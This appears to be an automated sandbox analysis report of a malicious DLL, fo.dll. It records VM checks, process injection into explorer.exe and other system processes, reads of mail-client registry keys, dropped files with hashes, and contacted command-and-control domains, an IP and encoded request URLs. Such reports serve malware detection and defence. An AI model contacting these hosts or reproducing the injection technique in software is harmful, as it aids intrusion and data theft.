Source: explorer.exe, 00000022.00000000.373438920.000000000871F000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
Source: explorer.exe, 00000022.00000000.372950738.0000000008220000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000022.00000000.373223897.0000000008640000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: RuntimeBroker.exe, 00000024.00000000.376999083.000001FC1125D000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000022.00000003.550503727.000000000F778000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000022.00000000.368833121.00000000055D0000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
Source: explorer.exe, 00000022.00000000.373438920.000000000871F000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
Source: explorer.exe, 00000022.00000000.373438920.000000000871F000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000022.00000000.368864149.0000000005603000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
Source: explorer.exe, 00000022.00000000.372950738.0000000008220000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000022.00000000.372950738.0000000008220000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000022.00000000.377647298.000000000F75B000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: mshta.exe, 00000017.00000003.320382883.000001713686A000.00000004.00000001.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\`j?
Source: explorer.exe, 00000022.00000000.372950738.0000000008220000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Windows\System32\loaddll32.exe	Memory allocated: C:\Windows\System32\control.exe base: 8A0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1FC13560000 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 177641C0000 protect: page execute and read and write
Source: C:\Windows\System32\control.exe	Memory allocated: C:\Windows\System32\rundll32.exe base: 29741CD0000 protect: page execute and read and write

Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFB736E1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFB736E1580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFB736E1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFB736E1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFB736E1580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFB736E1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFB736E1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFB736E1580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFB736E1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFB736E1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFB736E1580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFB736E1580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe	Memory protected: unknown base: 7FFB736E1580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe	Memory protected: unknown base: 7FFB736E1580 protect: page execute read
Source: C:\Windows\System32\control.exe	Memory protected: unknown base: 7FFB736E1580 protect: page execute and read and write

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread created: C:\Windows\explorer.exe EIP: 736E1580	Jump to behavior
Source: C:\Windows\explorer.exe	Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 736E1580
Source: C:\Windows\explorer.exe	Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 736E1580
Source: C:\Windows\explorer.exe	Thread created: unknown EIP: 736E1580
Source: C:\Windows\explorer.exe	Thread created: unknown EIP: 736E1580
Source: C:\Windows\System32\control.exe	Thread created: unknown EIP: 736E1580

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3388 base: 10B4000 value: 00	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3388 base: 7FFB736E1580 value: EB	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3388 base: 3290000 value: 80	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3388 base: 7FFB736E1580 value: 40	Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Section loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\System32\control.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\System32\control.exe	Section loaded: unknown target: C:\Windows\System32\rundll32.exe protection: execute and read and write

Source: C:\Windows\System32\loaddll32.exe	Thread register set: target process: 4544	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread register set: target process: 3388	Jump to behavior
Source: C:\Windows\explorer.exe	Thread register set: target process: 3668
Source: C:\Windows\explorer.exe	Thread register set: target process: 4376
Source: C:\Windows\explorer.exe	Thread register set: target process: 4588
Source: C:\Windows\explorer.exe	Thread register set: target process: 5968
Source: C:\Windows\System32\control.exe	Thread register set: target process: 3388
Source: C:\Windows\System32\control.exe	Thread register set: target process: 4000

Source: C:\Windows\System32\loaddll32.exe	Memory written: C:\Windows\System32\control.exe base: 7FF6864512E0	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Memory written: C:\Windows\System32\control.exe base: 8A0000	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Memory written: C:\Windows\System32\control.exe base: 7FF6864512E0	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 10B4000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 7FFB736E1580	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 3290000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 7FFB736E1580	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 6E40E02000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFB736E1580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1FC13560000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFB736E1580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 29233F0000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFB736E1580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 177641C0000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFB736E1580
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\System32\rundll32.exe base: 7FF6784A5FD0
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\System32\rundll32.exe base: 29741CD0000
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\System32\rundll32.exe base: 7FF6784A5FD0

Analysis Report fo.dll

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs

Source: explorer.exe, 00000022.00000000.359205948.0000000001398000.00000004.00000020.sdmp	Binary or memory string: ProgmanamF
Source: explorer.exe, 00000022.00000002.576575569.0000000001980000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000024.00000002.578475888.000001FC11790000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000027.00000000.385331538.0000017764860000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000022.00000002.576575569.0000000001980000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000024.00000002.578475888.000001FC11790000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000027.00000000.385331538.0000017764860000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000022.00000002.576575569.0000000001980000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000024.00000002.578475888.000001FC11790000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000027.00000000.385331538.0000017764860000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000022.00000002.576575569.0000000001980000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000024.00000002.578475888.000001FC11790000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000027.00000000.385331538.0000017764860000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior

Source: C:\Windows\explorer.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
Source: C:\Windows\explorer.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Name	IP	Active
c56.lepini.at	46.173.218.93	true
resolver1.opendns.com	208.67.222.222	true
api3.lepini.at	46.173.218.93	true
golang.feel500.at	46.173.218.93	true

Name	Malicious	Antivirus Detection	Reputation
http://api3.lepini.at/api1/ipkOawhdO/F52eJKhwUcG06WP2HLQN/R0jJnvVAA8EDAUgmS0_/2FIWxO0LcR3agLNKgkN72q/NoKlbmR1jbqaB/cBOHyfBK/7dSD2TwdA3ZRMuF_2Fj6BPu/iunZMqCjDp/VFA2IbXgNeHXsvtgz/F3TkA8_2BPdU/zK42LuRzbIT/JuaCbi0NbSeRnk/KhYiDpWSD2RZ2bQdWGPfC/nDZijfrlMnnGxh_2/FHOVdiTONucjy5K/5dEEriuTgw0nr3k_2B/qKLcFj_2F/Z58uDx2yW7MbZBTWo3r5/Sb9v4SGYIi7DV31SNVj/yme1_2Fck2Z6g5WodurnhV/hls2yJ_2FYXxHU_2B/fzq	false	Avira URL Cloud: safe	unknown
http://golang.feel500.at/favicon.ico	false	Avira URL Cloud: safe	unknown
http://api3.lepini.at/api1/ge76nNd2r9i7q/f4m7qnru/ODJiitx5KnO_2FlTKPLiqHN/iN3_2FwnGS/cMz53x6_2BNTJzFKu/GvXWghhznGvj/xuyrdDzhJ8U/ipLoAih5yQdyhW/jYxcE7DfgVGYeA0ymDNSv/2cXxlL4sP4_2B7dE/KscxdpWWxM653_2/B_2Fz0kRfaWcJF5wq8/85RpQlZKe/V8jy_2BSqfOrqvaSuZRQ/jK1M36Z4E2lD5gJWX4u/PXlLACwNTib8qbZUXKDq1s/5q3wJc33iTaAL/UKszY336/PyF_2B_2Fxuh9RQFy7nHHpu/xcXSzckdW9/8jC6GzIl/MxkKpsQ	false	Avira URL Cloud: safe	unknown

ID:	334007
Product:	CloudBasic
Start time:	20:04:22
Start date:	24.12.2020
Sample:	fo.dll
Cookbook:	default.jbs
System description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Architecture:	WINDOWS
MD5:	b72c009b01b9321cbcb327cf285ccef7
SHA1:	8599a832cdc973e8949a631c349980c0f41ffc48
SHA256:	edf82bc9c74787acbae4fc2a22aa35646616d23b781d6a75a7799a25431398c6
Filetype:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{76F37E59-4666-11EB-90E4-ECF4BB862DED}.dat	Microsoft Word Document	3BA40B952E8AE2226129E9FFBDFCE86F	58E72451A1BABB726B4B6C9C178D5DCD5AD390EB	51E43890FB861E66B3F765CC577457F9A65A9CE932C4198E9823659934FEB804
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{76F37E5B-4666-11EB-90E4-ECF4BB862DED}.dat	Microsoft Word Document	BDF39A01D5B6930DFFBCC014A4E20D0E	B65857A04CDDF2AAAE530325E6D2B20047722986	E5099D30232FC511ABDCBD78C6ABFF45CDA166BBA9DB38B149EF24070E019685
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{76F37E5D-4666-11EB-90E4-ECF4BB862DED}.dat	Microsoft Word Document	4CC6588A2130BC9243A79FE607FFFBEE	672A8E0A0DD98FDB277B41C129BCD778C265A9ED	328E16C9551AB5D731DAA862A0C1B49A7BF7EE71B2982C387F70B822C8827A0A
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{76F37E5F-4666-11EB-90E4-ECF4BB862DED}.dat	Microsoft Word Document	7C325C3F297C4DCF0BF1C197EE980E39	6814BFBF8F902662AA3C4BDA71FFDEC60886C297	89F481EF96B0B3E8C1AD4502AD82BEC2686F8CD8C7411DBFE942AB91455807A8
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\m40BS[1].htm	ASCII text, with very long lines, with no line terminators	65DF8DC167A20C263A4D3534FFF80DA1	FA869DCD5A6DD621650C6F2BDD633C89C0FD8F80	3D7118852FB84D0DC3D1416E5A952F1362C0FC2830B59C7BB32C59BEA72CC1E6
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\dh68UKBF[1].htm	ASCII text, with very long lines, with no line terminators	FE25148E04D4F5E36248F4ED7EF32D51	065BC9E2F194E00B370C09937CE8980BE22A82D6	BD24C0946CDE89C66BB749921A4F0E476471E25A1DD219F044CC9D0477BEABB4
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\c[1].htm	ASCII text, with very long lines, with no line terminators	5D7CEF728FB6CEF31E56E02DCF81A722	D817BC33E2242AA5C3E73379CA028CF2E6D64F3A	A60C4644F3831A39E2A2F054B3D79AEF8AED1A70D145FA4EED92B9C1987BD74B
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache	data	1F1446CE05A385817C3EF20CBD8B6E6A	1E4B1EE5EFCA361C9FB5DC286DD7A99DEA31F33D	2BCEC12B7B67668569124FED0E0CEF2C1505B742F7AE2CF86C8544D07D59F2CE
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	data	13AF6BE1CB30E2FB779EA728EE0A6D67	F33581AC2C60B1F02C978D14DC220DCE57CC9562	168561FB18F8EBA8043FA9FC4B8A95B628F2CF5584E5A3B96C9EBAF6DD740E3F
C:\Users\user\AppData\Local\Temp\1E42.bin	ASCII text, with very long lines, with no line terminators	C776E0BF04DF2D40BB86437F43C74CBF	3241F454C899AA8984347141AB38D85FC5756036	56BDA2DD863AE13A0BD1748BA442E85992AD0DB739BE0CACF881BF9EAF632F75
C:\Users\user\AppData\Local\Temp\1dcawf3x\1dcawf3x.0.cs	UTF-8 Unicode (with BOM) text	66C992425F6FC8E496BCA0C59044EDFD	9900C115A66028CD4E43BD8C2D01401357FD7579	85FEE59EDA69CF81416915A84F0B8F7D8980A3A582B5FA6CC27A8C1340838B6C
C:\Users\user\AppData\Local\Temp\1dcawf3x\1dcawf3x.cmdline	UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators	B59FF73B6F2356C8B3A7D53ED5B6A984	79952785C7C98A8CEEF5E6A6BC831D29E646CB35	101A98677CAE531FC2DD33F58EC9C71231D260824C7AF1AF23FAC46A8F6EF92B
C:\Users\user\AppData\Local\Temp\1dcawf3x\1dcawf3x.dll	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows	681EB1FEADCF19F96249850A9BF3C44D	A2EA9BC5955DC7E43A8D8CB3FAA5411E3805E388	2143EBA7F00C01B97CEFCAF004818DE2AD5A504017CEA4988FD737F312247C4F
C:\Users\user\AppData\Local\Temp\1dcawf3x\1dcawf3x.out	ASCII text, with CRLF, CR line terminators	83B3C9D9190CE2C57B83EEE13A9719DF	ABFAB07DEA88AF5D3AF75970E119FE44F43FE19E	B5D219E5143716023566DD71C0195F41F32C3E7F30F24345E1708C391DEEEFDA
C:\Users\user\AppData\Local\Temp\1dcawf3x\CSCA42BA027116C433D856471BB95F3A1F.TMP	MSVC .res	4A96CE1037F4F42665427827B103AC20	0B9A6C891779474103D93DF4575C13693E1E0F09	9F4168602570EDA2026FD4A76F88478ED6B6279D4E3FD8C6C9E804BEF969DBB0
C:\Users\user\AppData\Local\Temp\9634.bin	data	8BACB2C9EB749ECDB8092B8A8F619E75	2225F4165AFBC56A3C03FAF5A319582BD04D870A	9639B2B099DE0E8288A272AC7E66845617612B7DD60E2AC5CF381ADC8C2C029B
C:\Users\user\AppData\Local\Temp\JavaDeployReg.log	ASCII text, with CRLF line terminators	423B1FA12F8995B5F6845BB7F45C3625	56838D71082660229E4D9E59C7B5E8FA7D8161E7	EB6D1D164BC713159B697C801ABDE2DCC6783177181F7D6BAE6E12F811D92DB6
C:\Users\user\AppData\Local\Temp\RES8A0A.tmp	data	A03D82A9136D98FA3BD91E9184B0BBD1	02F4CA54A9C0ED19EB356C7A1ECA83E3EBE3ED78	3213A0A5DC54F048FBA85A138A3CA82E4BF93D0E1B91982DD39DBF9019C5E30A
C:\Users\user\AppData\Local\Temp\RES97F5.tmp	data	A96DC2A7E9D8FD224A6C7D5E7554BC07	B7EB62A39397C95AAD5428DFEA767BBCD515EA77	44991F6758348263713125B660535611E46B46F42A004EF84A643E6F2ADBAF66
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5em5ahyt.yzd.psm1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lil2rdrc.l5h.ps1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\b5r2gs3w\CSCC26898CFCBA4739B5B18589DB58EA5A.TMP	MSVC .res	38CF2D951D4318C2C2A048F44659F2FA	ED3F7B3899285E7AC7BE66E053A1AE240F3603A5	B4E9229BD0F6446F0685E62478FC8C7E1FFBBDABC0F688DAA798F595DF26314E
C:\Users\user\AppData\Local\Temp\b5r2gs3w\b5r2gs3w.0.cs	UTF-8 Unicode (with BOM) text	9B2165E59D51BB6E8E99190BD9C6BC8B	02B2F188D7654CA079ADA726994D383CF75FF114	36E14435EE02B02C2B06087FF3750569342E8B8D8571F3F45E61AF50D3B03CEA
C:\Users\user\AppData\Local\Temp\b5r2gs3w\b5r2gs3w.cmdline	UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators	3B4D9EAC8C2E75560D56D6C821D46B4B	EAB33668975673269FCF24231B31EECCCC9CB80E	6705597A8270976A98451200DE1F37B06ABC0B8BF1A4CFF9DA8031BF6E01BBCB
C:\Users\user\AppData\Local\Temp\b5r2gs3w\b5r2gs3w.dll	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows	81F30C38D7E34BC044039A696C2AD767	8D95ACD7DFC46DA99687C5FEA99DBBEE4BCB3FB8	170B4BF11B20E8E2D6CDBE68C5A4AFF91827D9DE66EC60070059D8970689F1BF
C:\Users\user\AppData\Local\Temp\b5r2gs3w\b5r2gs3w.out	ASCII text, with CRLF, CR line terminators	83B3C9D9190CE2C57B83EEE13A9719DF	ABFAB07DEA88AF5D3AF75970E119FE44F43FE19E	B5D219E5143716023566DD71C0195F41F32C3E7F30F24345E1708C391DEEEFDA
C:\Users\user\AppData\Local\Temp\~DF5EC5B053F0D07BBB.TMP	data	3C3295D5682D8B7D2191E266AD608DB1	2B450FDC8A8167F27A826F5655B0629218ABD442	C3E2316A2D004FAE565A5AE2F28029EC31D781C139D21362203F97C5C544A9C2
C:\Users\user\AppData\Local\Temp\~DFB66FFAD31CD35F0D.TMP	data	CA52C0FA479249691F85569D97DFCAF5	3E7E2CCF6245992FBEEC4A02C5548175F0F551AC	133585CAA9CAB798CA3E2AA3F53CAEE9CC073D83BE46B7A33EDE2AA42D9E76B4
C:\Users\user\AppData\Local\Temp\~DFCE9772CEB2FA999E.TMP	data	772F68DB8C47C363934A50FFF843DDDF	B7B1DC3A421B7E50EBFA753A473680FF32EF96F6	4AA529B4748022D309EE1EC9B7697B8AA7D1BF4AE6AC3DCDF6DABC657D7741DD
C:\Users\user\AppData\Local\Temp\~DFEC113D747FBB8244.TMP	data	4D5AF508FD40653DB3EDC398A730109A	9E8434474945CAF9EE34645C001DC00F979F5021	91515EA59940698096425716363B8B12115B3DFBA833C0A5C2CC166857F741F4
C:\Users\user\AppData\Roaming\Microsoft\{FC666F93-2B96-8EB5-95F0-8FA2992433F6}	ASCII text, with CRLF line terminators	613E892365E73A324B6725D5C69FAD21	C8EFB9264DAC2A48C94722446D94CCB7882EF36F	D0BE0EC8E2FE86A6DE6C6292BA2A95103F1D5B42DA225DF05057EA3D206DC0AF
C:\Users\user\Documents\20201224\PowerShell_transcript.579569.evZorecE.20201224200606.txt	UTF-8 Unicode (with BOM) text, with CRLF line terminators	BDB088ECAF159870C10B53505822040D	B283FFE225CB8A0BD7F77FD48615E7D0F35A97FE	707378DAA8774518869558B9A49526C23E571D414B99379CB1020E82C7E56555